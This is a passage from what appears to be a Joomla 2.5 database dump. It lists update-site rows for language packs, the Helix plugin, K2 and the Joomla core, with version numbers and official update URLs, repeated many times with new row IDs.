Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1890,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1891,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1892,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1893,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1894,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1895,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1896,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1897,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1898,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1899,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1900,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1901,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1902,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1903,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1904,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1905,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1906,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1907,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1908,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1909,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1910,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1911,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1912,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1913,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1914,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1915,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1916,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1917,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1918,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1919,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1920,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1921,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1922,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1923,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1924,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1925,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1926,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1927,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1928,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1929,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1930,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1931,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1932,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1933,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1934,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1935,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1936,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1937,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1938,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1939,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1940,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1941,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1942,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1943,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1944,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1945,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1946,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1947,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1948,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1949,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1950,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1951,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1952,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1953,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1954,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1955,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1956,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1957,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1958,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1959,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1960,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1961,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1962,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1963,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1964,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1965,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1966,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1967,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1968,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1969,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1970,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1971,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1972,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1973,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1974,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1975,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1976,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1977,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1978,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1979,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1980,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1981,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1982,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1983,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1984,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1985,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1986,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1987,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1988,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1989,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1990,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1991,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1992,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1993,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1994,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1995,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1996,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1997,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1998,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1999,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2000,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2001,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2002,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2003,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2004,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2005,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2006,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2007,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2008,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2009,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2010,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2011,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2012,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2013,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2014,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2015,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2016,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2017,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2018,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2019,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2020,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2021,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2022,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2023,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2024,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2025,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2026,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2027,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2028,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2029,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2030,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2031,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2032,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2033,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2034,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2035,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2036,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2037,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2038,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2039,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2040,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2041,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2042,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2043,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2044,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2045,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2046,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2047,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2048,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2049,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2050,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2051,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2052,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2053,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2054,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2055,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2056,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2057,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2058,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2059,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2060,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2061,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2062,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2063,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2064,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2065,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2066,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2067,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2068,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2069,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2070,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2071,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2072,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2073,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2074,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2075,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2076,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2077,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2078,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2079,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2080,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2081,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2082,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2083,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2084,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2085,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2086,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2087,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2088,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2089,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2090,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2091,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2092,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2093,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2094,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2095,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2096,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2097,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2098,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2099,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2100,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2101,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2102,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2103,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2104,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2105,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2106,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2107,3,0,